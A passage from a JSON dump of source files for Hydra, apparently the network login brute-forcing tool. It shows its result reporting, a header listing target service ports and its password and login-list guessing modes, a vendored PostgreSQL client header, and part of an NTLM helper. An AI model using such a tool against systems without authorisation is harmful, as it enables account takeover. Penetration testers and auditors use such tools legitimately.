hydra_kill_head(i, 1, 3);\n (void)waitpid(-1, NULL, WNOHANG);\n\n#define STRMAX (10 * 1024)\n char json_error[STRMAX + 2], tmp_str[STRMAX + 2];\n memset(json_error, 0, STRMAX + 2);\n memset(tmp_str, 0, STRMAX + 2);\n if (error) {\n snprintf(tmp_str, STRMAX, \"[ERROR] %d target%s disabled because of too many errors\", error, error == 1 ? \" was\" : \"s were\");\n fprintf(stderr, \"%s\\n\", tmp_str);\n strncat(json_error, \"\\\"\", STRMAX);\n strncat(json_error, tmp_str, STRMAX);\n strncat(json_error, \"\\\"\", STRMAX);\n error = 1;\n }\n if (k) {\n snprintf(tmp_str, STRMAX, \"[ERROR] %d target%s did not resolve or could not be connected\", k, k == 1 ? \"\" : \"s\");\n fprintf(stderr, \"%s\\n\", tmp_str);\n if (*json_error) {\n strncat(json_error, \", \", STRMAX);\n }\n strncat(json_error, \"\\\"\", STRMAX);\n strncat(json_error, tmp_str, STRMAX);\n strncat(json_error, \"\\\"\", STRMAX);\n error = 1;\n }\n if (error) {\n snprintf(tmp_str, STRMAX, \"[ERROR] %d target%s did not complete\", j, j < 1 ? \"\" : \"s\");\n fprintf(stderr, \"%s\\n\", tmp_str);\n if (*json_error) {\n strncat(json_error, \", \", STRMAX);\n }\n strncat(json_error, \"\\\"\", STRMAX);\n strncat(json_error, tmp_str, STRMAX);\n strncat(json_error, \"\\\"\", STRMAX);\n error = 1;\n hydra_restore_write(1);\n }\n // yeah we did it\n printf(\"%s (%s) finished at %s\\n\", PROGRAM, RESOURCE, hydra_build_time());\n if (hydra_brains.ofp != NULL && hydra_brains.ofp != stdout) {\n if (hydra_options.outfile_format == FORMAT_JSONV1) {\n fprintf(hydra_brains.ofp,\n \"\\n\\t],\\n\\\"success\\\": %s,\\n\\\"errormessages\\\": [ %s \"\n \"],\\n\\\"quantityfound\\\": %\" hPRIu64 \" }\\n\",\n (error ? \"false\" : \"true\"), json_error, hydra_brains.found);\n }\n fclose(hydra_brains.ofp);\n }\n\n fflush(NULL);\n if (error || j != 0 || exit_condition < 0)\n return -1;\n else\n return 0;\n}\n" }, { "path": "hydra.h", "content": "#ifndef _HYDRA_H\n\n#include \n#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX) || defined(__APPLE__)\n#include \n#else\n#include \n#endif\n\n#if defined(_INTTYPES_H) || defined(__CLANG_INTTYPES_H)\n#define hPRIu64 PRIu64\n#else\n#define hPRIu64 \"lu\"\n#endif\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifdef HAVE_OPENSSL\n#define HYDRA_SSL\n#endif\n#ifdef HAVE_SSL\n#ifndef HYDRA_SSL\n#define HYDRA_SSL\n#endif\n#endif\n\n#ifdef LIBSSH\n#include \n#endif\n\n#ifdef HAVE_ZLIB\n#include \n#endif\n\n#define OPTION_SSL 1\n\n#ifdef LIBOPENSSL\n#ifndef NO_RSA_LEGACY\n#if OPENSSL_VERSION_NUMBER >= 0x10100000L\n#define NO_RSA_LEGACY\n#endif\n#endif\n#endif\n\n#define PORT_NOPORT -1\n#define PORT_FTP 21\n#define PORT_FTP_SSL 990\n#define PORT_TELNET 23\n#define PORT_TELNET_SSL 992\n#define PORT_HTTP 80\n#define PORT_HTTP_SSL 443\n#define PORT_HTTP_PROXY 3128\n#define PORT_HTTP_PROXY_SSL 3128\n#define PORT_POP3 110\n#define PORT_POP3_SSL 995\n#define PORT_NNTP 119\n#define PORT_NNTP_SSL 563\n#define PORT_SMB 139\n#define PORT_SMB_SSL 139\n#define PORT_SMBNT 445\n#define PORT_SMBNT_SSL 445\n#define PORT_IMAP 143\n#define PORT_IMAP_SSL 993\n#define PORT_LDAP 389\n#define PORT_LDAP_SSL 636\n#define PORT_REXEC 512\n#define PORT_REXEC_SSL 512\n#define PORT_RLOGIN 513\n#define PORT_RLOGIN_SSL 513\n#define PORT_RSH 514\n#define PORT_RSH_SSL 514\n#define PORT_SOCKS5 1080\n#define PORT_SOCKS5_SSL 1080\n#define PORT_ICQ 4000\n#define PORT_ICQ_SSL -1\n#define PORT_VNC 5900\n#define PORT_VNC_SSL 5901\n#define PORT_PCNFS 0\n#define PORT_PCNFS_SSL -1\n#define PORT_MYSQL 3306\n#define PORT_MYSQL_SSL 3306\n#define PORT_MSSQL 1433\n#define PORT_MSSQL_SSL 1433\n#define PORT_COBALTSTRIKE 50050\n#define PORT_COBALTSTRIKE_SSL 50050\n#define PORT_POSTGRES 5432\n#define PORT_POSTGRES_SSL 5432\n#define PORT_ORACLE 1521\n#define PORT_ORACLE_SSL 1521\n#define PORT_PCANYWHERE 5631\n#define PORT_PCANYWHERE_SSL 5631\n#define PORT_ADAM6500 502\n#define PORT_ADAM6500_SSL 502\n#define PORT_SAPR3 -1\n#define PORT_SAPR3_SSL -1\n#define PORT_SSH 22\n#define PORT_SSH_SSL 22\n#define PORT_SNMP 161\n#define PORT_SNMP_SSL 1993\n#define PORT_CVS 2401\n#define PORT_CVS_SSL 2401\n#define PORT_FIREBIRD 3050\n#define PORT_FIREBIRD_SSL 3050\n#define PORT_AFP 548\n#define PORT_AFP_SSL 548\n#define PORT_NCP 524\n#define PORT_NCP_SSL 524\n#define PORT_SVN 3690\n#define PORT_SVN_SSL 3690\n#define PORT_SMTP 25\n#define PORT_SMTP_SSL 465\n#define PORT_TEAMSPEAK 8767\n#define PORT_TEAMSPEAK_SSL 8767\n#define PORT_SIP 5060\n#define PORT_SIP_SSL 5061\n#define PORT_VMAUTHD 902\n#define PORT_VMAUTHD_SSL 902\n#define PORT_XMPP 5222\n#define PORT_XMPP_SSL 5223\n#define PORT_IRC 6667\n#define PORT_IRC_SSL 6697\n#define PORT_RDP 3389\n#define PORT_RDP_SSL 3389\n#define PORT_ASTERISK 5038\n#define PORT_ASTERISK_SSL 5038\n#define PORT_S7_300 102\n#define PORT_S7_300_SSL 102\n#define PORT_REDIS 6379\n#define PORT_REDIS_SSL 6379\n#define PORT_RTSP 554\n#define PORT_RTSP_SSL 554\n#define PORT_RPCAP 2002\n#define PORT_RPCAP_SSL 2002\n#define PORT_RADMIN2 4899\n#define PORT_MCACHED 11211\n#define PORT_MCACHED_SSL 11211\n#define PORT_MONGODB 27017\n\n#define False 0\n#define True 1\n\n#ifndef INET_ADDRSTRLEN\n#define INET_ADDRSTRLEN 16\n#endif\n\n#define MAX_PROXY_COUNT 64\n\n#ifndef _WIN32\nint32_t sleepn(time_t seconds);\nint32_t usleepn(uint64_t useconds);\n#else\nint32_t sleepn(uint32_t seconds);\nint32_t usleepn(uint32_t useconds);\n#endif\n\ntypedef enum { MODE_PASSWORD_LIST = 1, MODE_LOGIN_LIST = 2, MODE_PASSWORD_BRUTE = 4, MODE_PASSWORD_REVERSE = 8, MODE_PASSWORD_NULL = 16, MODE_PASSWORD_SAME = 32, MODE_COLON_FILE = 64 } hydra_mode_t;\n\ntypedef enum { FORMAT_PLAIN_TEXT, FORMAT_JSONV1, FORMAT_JSONV2, FORMAT_XMLV1 } output_format_t;\n\ntypedef struct {\n hydra_mode_t mode;\n int32_t loop_mode; // valid modes: 0 = password, 1 = user\n int32_t ssl;\n int32_t restore;\n int32_t debug; // is external - for restore\n int32_t verbose; // is external - for restore\n int32_t showAttempt;\n int32_t tasks;\n int32_t try_null_password;\n int32_t try_password_same_as_login;\n int32_t try_password_reverse_login;\n int32_t exit_found;\n int32_t max_use;\n int32_t cidr;\n int32_t time_next_attempt;\n output_format_t outfile_format;\n char *distributed; // Use distributed computing by splitting user files on the fly\n char *login;\n char *loginfile;\n char *pass;\n char *passfile;\n char *outfile_ptr;\n char *infile_ptr;\n char *colonfile;\n int32_t waittime; // is external - for restore\n int32_t conwait; // is external - for restore\n uint32_t port; // is external - for restore\n char *miscptr;\n char *server;\n char *service;\n char bfg;\n int32_t skip_redo;\n} hydra_option;\n\n#define _HYDRA_H\n#endif\n" }, { "path": "libpq-fe.h", "content": "\n/*-------------------------------------------------------------------------\n *\n * libpq-fe.h\n *\t This file contains definitions for structures and\n *\t externs for functions used by frontend postgres applications.\n *\n * Portions Copyright (c) 1996-2003, PostgreSQL Global Development Group\n * Portions Copyright (c) 1994, Regents of the University of California\n *\n * $Id: libpq-fe.h,v 1.100 2003/08/27 00:33:34 petere Exp $\n *\n *-------------------------------------------------------------------------\n */\n\n#ifndef LIBPQ_FE_H\n#define LIBPQ_FE_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include \n\n/*\n * postgres_ext.h defines the backend's externally visible types,\n * such as Oid.\n */\n#include \"postgres_ext.h\"\n\n/* SSL type is needed here only to declare PQgetssl() */\n#ifdef USE_SSL\n#include \n#endif\n\n/* Application-visible enum types */\n\ntypedef enum {\n /*\n * Although it is okay to add to this list, values which become unused\n * should never be removed, nor should constants be redefined - that\n * would break compatibility with existing code.\n */\n CONNECTION_OK,\n CONNECTION_BAD,\n /* Non-blocking mode only below here */\n\n /*\n * The existence of these should never be relied upon - they should\n * only be used for user feedback or similar purposes.\n */\n CONNECTION_STARTED, /* Waiting for connection to be made. */\n CONNECTION_MADE, /* Connection OK; waiting to send. */\n CONNECTION_AWAITING_RESPONSE, /* Waiting for a response from the\n * postmaster. */\n CONNECTION_AUTH_OK, /* Received authentication; waiting for\n * backend startup. */\n CONNECTION_SETENV, /* Negotiating environment. */\n CONNECTION_SSL_STARTUP, /* Negotiating SSL. */\n CONNECTION_NEEDED /* Internal state: connect() needed */\n} ConnStatusType;\n\ntypedef enum {\n PGRES_POLLING_FAILED = 0,\n PGRES_POLLING_READING, /* These two indicate that one may */\n PGRES_POLLING_WRITING, /* use select before polling again. */\n PGRES_POLLING_OK,\n PGRES_POLLING_ACTIVE /* unused; keep for awhile for backwards\n * compatibility */\n} PostgresPollingStatusType;\n\ntypedef enum {\n PGRES_EMPTY_QUERY = 0, /* empty query string was executed */\n PGRES_COMMAND_OK, /* a query command that doesn't return\n * anything was executed properly by the\n * backend */\n PGRES_TUPLES_OK, /* a query command that returns tuples was\n * executed properly by the backend,\n * PGresult contains the result tuples */\n PGRES_COPY_OUT, /* Copy Out data transfer in progress */\n PGRES_COPY_IN, /* Copy In data transfer in progress */\n PGRES_BAD_RESPONSE, /* an unexpected response was recv'd from\n * the backend */\n PGRES_NONFATAL_ERROR, /* notice or warning message */\n PGRES_FATAL_ERROR /* query failed */\n} ExecStatusType;\n\ntypedef enum {\n PQTRANS_IDLE, /* connection idle */\n PQTRANS_ACTIVE, /* command in progress */\n PQTRANS_INTRANS, /* idle, within transaction block */\n PQTRANS_INERROR, /* idle, within failed transaction */\n PQTRANS_UNKNOWN /* cannot determine status */\n} PGTransactionStatusType;\n\ntypedef enum {\n PQERRORS_TERSE, /* single-line error messages */\n PQERRORS_DEFAULT, /* recommended style */\n PQERRORS_VERBOSE /* all the facts, ma'am */\n} PGVerbosity;\n\n/* PGconn encapsulates a connection to the backend.\n * The contents of this struct are not supposed to be known to applications.\n */\ntypedef struct pg_conn PGconn;\n\n/* PGresult encapsulates the result of a query (or more precisely, of a single\n * SQL command --- a query string given to PQsendQuery can contain multiple\n * commands and thus return multiple PGresult objects).\n * The contents of this struct are not supposed to be known to applications.\n */\ntypedef struct pg_result PGresult;\n\n/* PGnotify represents the occurrence of a NOTIFY message.\n * Ideally this would be an opaque typedef, but it's so simple that it's\n * unlikely to change.\n * NOTE: in Postgres 6.4 and later, the be_pid is the notifying backend's,\n * whereas in earlier versions it was always your own backend's PID.\n */\ntypedef struct pgNotify {\n char *relname; /* notification condition name */\n int32_t be_pid; /* process ID of server process */\n char *extra; /* notification parameter */\n} PGnotify;\n\n/* Function types for notice-handling callbacks */\ntypedef void (*PQnoticeReceiver)(void *arg, const PGresult *res);\ntypedef void (*PQnoticeProcessor)(void *arg, const char *message);\n\n/* Print options for PQprint() */\ntypedef char pqbool;\n\ntypedef struct _PQprintOpt {\n pqbool header; /* print output field headings and row\n * count */\n pqbool align; /* fill align the fields */\n pqbool standard; /* old brain dead format */\n pqbool html3; /* output html tables */\n pqbool expanded; /* expand tables */\n pqbool pager; /* use pager for output if needed */\n char *fieldSep; /* field separator */\n char *tableOpt; /* insert to HTML */\n char *caption; /* HTML
*/\n char **fieldName; /* null terminated array of repalcement\n * field names */\n} PQprintOpt;\n\n/* ----------------\n * Structure for the conninfo parameter definitions returned by PQconndefaults\n *\n * All fields except \"val\" point at static strings which must not be altered.\n * \"val\" is either NULL or a malloc'd current-value string. PQconninfoFree()\n * will release both the val strings and the PQconninfoOption array itself.\n * ----------------\n */\ntypedef struct _PQconninfoOption {\n char *keyword; /* The keyword of the option */\n char *envvar; /* Fallback environment variable name */\n char *compiled; /* Fallback compiled in default value */\n char *val; /* Option's current value, or NULL */\n char *label; /* Label for field in connect dialog */\n char *dispchar; /* Character to display for this field in\n * a connect dialog. Values are: \"\"\n * Display entered value as is \"*\"\n * Password field - hide value \"D\" Debug\n * option - don't show by default */\n int32_t dispsize; /* Field size in characters for dialog */\n} PQconninfoOption;\n\n/* ----------------\n * PQArgBlock -- structure for PQfn() arguments\n * ----------------\n */\ntypedef struct {\n int32_t len;\n int32_t isint;\n union {\n int32_t *ptr; /* can't use void (dec compiler barfs) */\n int32_t integer;\n } u;\n} PQArgBlock;\n\n/* ----------------\n * Exported functions of libpq\n * ----------------\n */\n\n/* ===\tin fe-connect.c === */\n\n/* make a new client connection to the backend */\n\n/* Asynchronous (non-blocking) */\nextern PGconn *PQconnectStart(const char *conninfo);\nextern PostgresPollingStatusType PQconnectPoll(PGconn *conn);\n\n/* Synchronous (blocking) */\nextern PGconn *PQconnectdb(const char *conninfo);\nextern PGconn *PQsetdbLogin(const char *pghost, const char *pgport, const char *pgoptions, const char *pgtty, const char *dbName, const char *login, const char *pwd);\n\n#define PQsetdb(M_PGHOST, M_PGPORT, M_PGOPT, M_PGTTY, M_DBNAME) PQsetdbLogin(M_PGHOST, M_PGPORT, M_PGOPT, M_PGTTY, M_DBNAME, NULL, NULL)\n\n/* close the current connection and free the PGconn data structure */\nextern void PQfinish(PGconn *conn);\n\n/* get info about connection options known to PQconnectdb */\nextern PQconninfoOption *PQconndefaults(void);\n\n/* free the data structure returned by PQconndefaults() */\nextern void PQconninfoFree(PQconninfoOption *connOptions);\n\n/*\n * close the current connection and restablish a new one with the same\n * parameters\n */\n\n/* Asynchronous (non-blocking) */\nextern int32_t PQresetStart(PGconn *conn);\nextern PostgresPollingStatusType PQresetPoll(PGconn *conn);\n\n/* Synchronous (blocking) */\nextern void PQreset(PGconn *conn);\n\n/* issue a cancel request */\nextern int32_t PQrequestCancel(PGconn *conn);\n\n/* Accessor functions for PGconn objects */\nextern char *PQdb(const PGconn *conn);\nextern char *PQuser(const PGconn *conn);\nextern char *PQpass(const PGconn *conn);\nextern char *PQhost(const PGconn *conn);\nextern char *PQport(const PGconn *conn);\nextern char *PQtty(const PGconn *conn);\nextern char *PQoptions(const PGconn *conn);\nextern ConnStatusType PQstatus(const PGconn *conn);\nextern PGTransactionStatusType PQtransactionStatus(const PGconn *conn);\nextern const char *PQparameterStatus(const PGconn *conn, const char *paramName);\nextern int32_t PQprotocolVersion(const PGconn *conn);\nextern char *PQerrorMessage(const PGconn *conn);\nextern int32_t PQsocket(const PGconn *conn);\nextern int32_t PQbackendPID(const PGconn *conn);\nextern int32_t PQclientEncoding(const PGconn *conn);\nextern int32_t PQsetClientEncoding(PGconn *conn, const char *encoding);\n\n#ifdef USE_SSL\n\n/* Get the SSL structure associated with a connection */\nextern SSL *PQgetssl(PGconn *conn);\n#endif\n\n/* Set verbosity for PQerrorMessage and PQresultErrorMessage */\nextern PGVerbosity PQsetErrorVerbosity(PGconn *conn, PGVerbosity verbosity);\n\n/* Enable/disable tracing */\nextern void PQtrace(PGconn *conn, FILE *debug_port);\nextern void PQuntrace(PGconn *conn);\n\n/* Override default notice handling routines */\nextern PQnoticeReceiver PQsetNoticeReceiver(PGconn *conn, PQnoticeReceiver proc, void *arg);\nextern PQnoticeProcessor PQsetNoticeProcessor(PGconn *conn, PQnoticeProcessor proc, void *arg);\n\n/* === in fe-exec.c === */\n\n/* Simple synchronous query */\nextern PGresult *PQexec(PGconn *conn, const char *query);\nextern PGresult *PQexecParams(PGconn *conn, const char *command, int32_t nParams, const Oid *paramTypes, const char *const *paramValues, const int32_t *paramLengths, const int32_t *paramFormats, int32_t resultFormat);\nextern PGresult *PQexecPrepared(PGconn *conn, const char *stmtName, int32_t nParams, const char *const *paramValues, const int32_t *paramLengths, const int32_t *paramFormats, int32_t resultFormat);\n\n/* Interface for multiple-result or asynchronous queries */\nextern int32_t PQsendQuery(PGconn *conn, const char *query);\nextern int32_t PQsendQueryParams(PGconn *conn, const char *command, int32_t nParams, const Oid *paramTypes, const char *const *paramValues, const int32_t *paramLengths, const int32_t *paramFormats, int32_t resultFormat);\nextern int32_t PQsendQueryPrepared(PGconn *conn, const char *stmtName, int32_t nParams, const char *const *paramValues, const int32_t *paramLengths, const int32_t *paramFormats, int32_t resultFormat);\nextern PGresult *PQgetResult(PGconn *conn);\n\n/* Routines for managing an asynchronous query */\nextern int32_t PQisBusy(PGconn *conn);\nextern int32_t PQconsumeInput(PGconn *conn);\n\n/* LISTEN/NOTIFY support */\nextern PGnotify *PQnotifies(PGconn *conn);\n\n/* Routines for copy in/out */\nextern int32_t PQputCopyData(PGconn *conn, const char *buffer, int32_t nbytes);\nextern int32_t PQputCopyEnd(PGconn *conn, const char *errormsg);\nextern int32_t PQgetCopyData(PGconn *conn, char **buffer, int32_t async);\n\n/* Deprecated routines for copy in/out */\nextern int32_t PQgetline(PGconn *conn, char *string, int32_t length);\nextern int32_t PQputline(PGconn *conn, const char *string);\nextern int32_t PQgetlineAsync(PGconn *conn, char *buffer, int32_t bufsize);\nextern int32_t PQputnbytes(PGconn *conn, const char *buffer, int32_t nbytes);\nextern int32_t PQendcopy(PGconn *conn);\n\n/* Set blocking/nonblocking connection to the backend */\nextern int32_t PQsetnonblocking(PGconn *conn, int32_t arg);\nextern int32_t PQisnonblocking(const PGconn *conn);\n\n/* Force the write buffer to be written (or at least try) */\nextern int32_t PQflush(PGconn *conn);\n\n/*\n * \"Fast path\" interface --- not really recommended for application\n * use\n */\nextern PGresult *PQfn(PGconn *conn, int32_t fnid, int32_t *result_buf, int32_t *result_len, int32_t result_is_int, const PQArgBlock *args, int32_t nargs);\n\n/* Accessor functions for PGresult objects */\nextern ExecStatusType PQresultStatus(const PGresult *res);\nextern char *PQresStatus(ExecStatusType status);\nextern char *PQresultErrorMessage(const PGresult *res);\nextern char *PQresultErrorField(const PGresult *res, int32_t fieldcode);\nextern int32_t PQntuples(const PGresult *res);\nextern int32_t PQnfields(const PGresult *res);\nextern int32_t PQbinaryTuples(const PGresult *res);\nextern char *PQfname(const PGresult *res, int32_t field_num);\nextern int32_t PQfnumber(const PGresult *res, const char *field_name);\nextern Oid PQftable(const PGresult *res, int32_t field_num);\nextern int32_t PQftablecol(const PGresult *res, int32_t field_num);\nextern int32_t PQfformat(const PGresult *res, int32_t field_num);\nextern Oid PQftype(const PGresult *res, int32_t field_num);\nextern int32_t PQfsize(const PGresult *res, int32_t field_num);\nextern int32_t PQfmod(const PGresult *res, int32_t field_num);\nextern char *PQcmdStatus(PGresult *res);\nextern char *PQoidStatus(const PGresult *res); /* old and ugly */\nextern Oid PQoidValue(const PGresult *res); /* new and improved */\nextern char *PQcmdTuples(PGresult *res);\nextern char *PQgetvalue(const PGresult *res, int32_t tup_num, int32_t field_num);\nextern int32_t PQgetlength(const PGresult *res, int32_t tup_num, int32_t field_num);\nextern int32_t PQgetisnull(const PGresult *res, int32_t tup_num, int32_t field_num);\n\n/* Delete a PGresult */\nextern void PQclear(PGresult *res);\n\n/* For freeing other alloc'd results, such as PGnotify structs */\nextern void PQfreemem(void *ptr);\n\n/* Exists for backward compatibility. bjm 2003-03-24 */\n#define PQfreeNotify(ptr) PQfreemem(ptr)\n\n/*\n * Make an empty PGresult with given status (some apps find this\n * useful). If conn is not NULL and status indicates an error, the\n * conn's errorMessage is copied.\n */\nextern PGresult *PQmakeEmptyPGresult(PGconn *conn, ExecStatusType status);\n\n/* Quoting strings before inclusion in queries. */\nextern size_t PQescapeString(char *to, const char *from, size_t length);\nextern unsigned char *PQescapeBytea(const unsigned char *bintext, size_t binlen, size_t *bytealen);\nextern unsigned char *PQunescapeBytea(const unsigned char *strtext, size_t *retbuflen);\n\n/* === in fe-print.c === */\n\nextern void PQprint(FILE *fout, /* output stream */\n const PGresult *res, const PQprintOpt *ps); /* option structure */\n\n/*\n * really old printing routines\n */\nextern void PQdisplayTuples(const PGresult *res, FILE *fp, /* where to send the output */\n int32_t fillAlign, /* pad the fields with spaces */\n const char *fieldSep, /* field separator */\n int32_t printHeader, /* display headers? */\n int32_t quiet);\n\nextern void PQprintTuples(const PGresult *res, FILE *fout, /* output stream */\n int32_t printAttName, /* print attribute names */\n int32_t terseOutput, /* delimiter bars */\n int32_t width); /* width of column, if 0, use variable\n * width */\n\n/* === in fe-lobj.c === */\n\n/* Large-object access routines */\nextern int32_t lo_open(PGconn *conn, Oid lobjId, int32_t mode);\nextern int32_t lo_close(PGconn *conn, int32_t fd);\nextern int32_t lo_read(PGconn *conn, int32_t fd, char *buf, size_t len);\nextern int32_t lo_write(PGconn *conn, int32_t fd, char *buf, size_t len);\nextern int32_t lo_lseek(PGconn *conn, int32_t fd, int32_t offset, int32_t whence);\nextern Oid lo_creat(PGconn *conn, int32_t mode);\nextern int32_t lo_tell(PGconn *conn, int32_t fd);\nextern int32_t lo_unlink(PGconn *conn, Oid lobjId);\nextern Oid lo_import(PGconn *conn, const char *filename);\nextern int32_t lo_export(PGconn *conn, Oid lobjId, const char *filename);\n\n/* === in fe-misc.c === */\n\n/* Determine length of multibyte encoded char at *s */\nextern int32_t PQmblen(const unsigned char *s, int32_t encoding);\n\n/* Get encoding id from environment variable PGCLIENTENCODING */\nextern int32_t PQenv2encoding(void);\n\n#ifdef __cplusplus\n}\n#endif\n#endif /* LIBPQ_FE_H */\n" }, { "path": "ntlm.c", "content": "/* $Id$\n Single file NTLM system to create and parse authentication messages.\n\n http://www.reversing.org\n ilo-- ilo@reversing.org\n\n I did copy&paste&modify several files to leave independent NTLM code\n that compile in cygwin/linux environment. Most of the code was ripped\n from Samba implementation so I left the Copying statement. Samba core\n code was left unmodified from 1.9 version.\n\n Also libntlm was ripped but rewrote, due to fixed and useless interface.\n Library oriented code was removed. (c) goes to: Simon Josefsson.\n\n Information about interface to this ntlm-system is in ntlm.h file.\n\n Unix SMB/Netbios implementation.\n Version 1.9.\n SMB parameters and setup\n Copyright (C) Andrew Tridgell 1992-1998\n Modified by Jeremy Allison 1995.\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\n */\n\n#include \n#ifdef WIN32\n#else\n#include \n#endif\n#include \"ntlm.h\"\n#include \n#include \n#include \n#include \n\n/* Byte order macros */\n#ifndef _BYTEORDER_H\n#define _BYTEORDER_H\n\n/*\n This file implements macros for machine independent short and\n int32_t manipulation\n\nHere is a description of this file that I emailed to the samba list once:\n\n> I am confused about the way that byteorder.h works in Samba. I have\n> looked at it, and I would have thought that you might make a distinction\n> between LE and BE machines, but you only seem to distinguish between 386\n> and all other architectures.\n>\n> Can you give me a clue?\n\nsure.\n\nThe distinction between 386 and other architectures is only there as\nan optimisation. You can take it out completely and it will make no\ndifference. The routines (macros) in byteorder.h are totally byteorder\nindependent. The 386 optimsation just takes advantage of the fact that\nthe x86 processors don't care about alignment, so we don't have to\nalign ints on int32_t boundaries etc. If there are other processors out\nthere that aren't alignment sensitive then you could also define\nCAREFUL_ALIGNMENT=0 on those processors as well.\n\nOk, now to the macros themselves. I'll take a simple example, say we\nwant to extract a 2 byte integer from a SMB packet and put it into a\ntype called uint16 that is in the local machines byte order, and you\nwant to do it with only the assumption that uint16 is _at_least_ 16\nbits long (this last condition is very important for architectures\nthat don't have any int32_t types that are 2 bytes long)\n\nYou do this:\n\n#define CVAL(buf,pos) (((unsigned char *)(buf))[pos])\n#define PVAL(buf,pos) ((unsigned)CVAL(buf,pos))\n#define SVAL(buf,pos) (PVAL(buf,pos)|PVAL(buf,(pos)+1)<<8)\n\nthen to extract a uint16 value at offset 25 in a buffer you do this:\n\nchar *buffer = foo_bar();\nuint16 xx = SVAL(buffer,25);\n\nWe are using the byteoder independence of the ANSI C bitshifts to do\nthe work. A good optimising compiler should turn this into efficient\ncode, especially if it happens to have the right byteorder :-)\n\nI know these macros can be made a bit tidier by removing some of the\ncasts, but you need to look at byteorder.h as a whole to see the\nreasoning behind them. byteorder.h defines the following macros:\n\nSVAL(buf,pos) - extract a 2 byte SMB value\nIVAL(buf,pos) - extract a 4 byte SMB value\nSVALS(buf,pos) signed version of SVAL()\nIVALS(buf,pos) signed version of IVAL()\n\nSSVAL(buf,pos,val) - put a 2 byte SMB value into a buffer\nSIVAL(buf,pos,val) - put a 4 byte SMB value into a buffer\nSSVALS(buf,pos,val) - signed version of SSVAL()\nSIVALS(buf,pos,val) - signed version of SIVAL()\n\nRSVAL(buf,pos) - like SVAL() but for NMB byte ordering\nRSVALS(buf,pos) - like SVALS() but for NMB byte ordering\nRIVAL(buf,pos) - like IVAL() but for NMB byte ordering\nRIVALS(buf,pos) - like IVALS() but for NMB byte ordering\nRSSVAL(buf,pos,val) - like SSVAL() but for NMB ordering\nRSIVAL(buf,pos,val) - like SIVAL() but for NMB ordering\nRSIVALS(buf,pos,val) - like SIVALS() but for NMB ordering\n\nit also defines lots of intermediate macros, just ignore those :-)\n\n*/\n\n/* some switch macros that do both store and read to and from SMB buffers */\n\n#define RW_PCVAL(read, inbuf, outbuf, len) \\\n { \\\n if (read) { \\\n PCVAL(inbuf, 0, outbuf, len); \\\n } else { \\\n PSCVAL(inbuf, 0, outbuf, len); \\\n } \\\n }\n\n#define RW_PIVAL(read, big_endian, inbuf, outbuf, len) \\\n { \\\n if (read) { \\\n if (big_endian) { \\\n RPIVAL(inbuf, 0, outbuf, len); \\\n } else { \\\n PIVAL(inbuf, 0, outbuf, len); \\\n } \\\n } else { \\\n if (big_endian) { \\\n RPSIVAL(inbuf, 0, outbuf, len); \\\n } else { \\\n PSIVAL(inbuf, 0, outbuf, len); \\\n } \\\n } \\\n }\n\n#define RW_PSVAL(read, big_endian, inbuf, outbuf, len) \\\n { \\\n if (read) { \\\n if (big_endian) { \\\n RPSVAL(inbuf, 0, outbuf, len); \\\n } else { \\\n PSVAL(inbuf, 0, outbuf, len); \\\n } \\\n } else { \\\n if (big_endian) { \\\n RPSSVAL(inbuf, 0, outbuf, len); \\\n } else { \\\n PSSVAL(inbuf, 0, outbuf, len); \\\n } \\\n } \\\n }\n\n#define RW_CVAL(read, inbuf, outbuf, offset) \\\n { \\\n if (read) { \\\n (outbuf) = CVAL(inbuf, offset); \\\n } else { \\\n SCVAL(inbuf, offset, outbuf); \\\n } \\\n }\n\n#define RW_IVAL(read, big_endian, inbuf, outbuf, offset) \\\n { \\\n if (read) { \\\n (outbuf) = ((big_endian) ? RIVAL(inbuf, offset) : IVAL(inbuf, offset)); \\\n } else { \\\n if (big_endian) { \\\n RSIVAL(inbuf, offset, outbuf); \\\n } else { \\\n SIVAL(inbuf, offset, outbuf); \\\n } \\\n } \\\n }\n\n#define RW_SVAL(read, big_endian, inbuf, outbuf, offset) \\\n { \\\n if (read) { \\\n (outbuf) = ((big_endian) ? RSVAL(inbuf, offset) : SVAL(inbuf, offset)); \\\n } else { \\\n if (big_endian) { \\\n RSSVAL(inbuf, offset, outbuf); \\\n } else { \\\n SSVAL(inbuf, offset, outbuf); \\\n } \\\n } \\\n }\n\n#undef CAREFUL_ALIGNMENT\n\n/* we know that the 386 can handle misalignment and has the \"right\"\n byteorder */\n#ifdef __i386__\n#define CAREFUL_ALIGNMENT 0\n#endif\n\n#ifndef CAREFUL_ALIGNMENT\n#define CAREFUL_ALIGNMENT 1\n#endif\n\n#define CVAL(buf, pos) (((unsigned char *)(buf))[pos])\n#define PVAL(buf, pos) ((unsigned)CVAL(buf, pos))\n#define SCVAL(buf, pos, val) (CVAL(buf, pos) = (val))\n\n#if CAREFUL_ALIGNMENT\n\n#define SVAL(buf, pos) (PVAL(buf, pos) | PVAL(buf, (pos) + 1) << 8)\n#define IVAL(buf, pos) (SVAL(buf, pos) | SVAL(buf, (pos) + 2) << 16)\n#define SSVALX(buf, pos, val) (CVAL(buf, pos) = (val) & 0xFF, CVAL(buf, pos + 1) = (val) >> 8)\n#define SIVALX(buf, pos, val) (SSVALX(buf, pos, val & 0xFFFF), SSVALX(buf, pos + 2, val >> 16))\n#define SVALS(buf, pos) ((int16)SVAL(buf, pos))\n#define IVALS(buf, pos) ((int32)IVAL(buf, pos))\n#define SSVAL(buf, pos, val) SSVALX((buf), (pos), ((uint16)(val)))\n#define SIVAL(buf, pos, val) SIVALX((buf), (pos), ((uint32)(val)))\n#define SSVALS(buf, pos, val) SSVALX((buf), (pos), ((int16)(val)))\n#define SIVALS(buf, pos, val) SIVALX((buf), (pos), ((int32)(val)))\n\n#else /* CAREFUL_ALIGNMENT */\n\n/* this handles things for architectures like the 386 that can handle\n alignment errors */\n\n/*\n WARNING: This section is 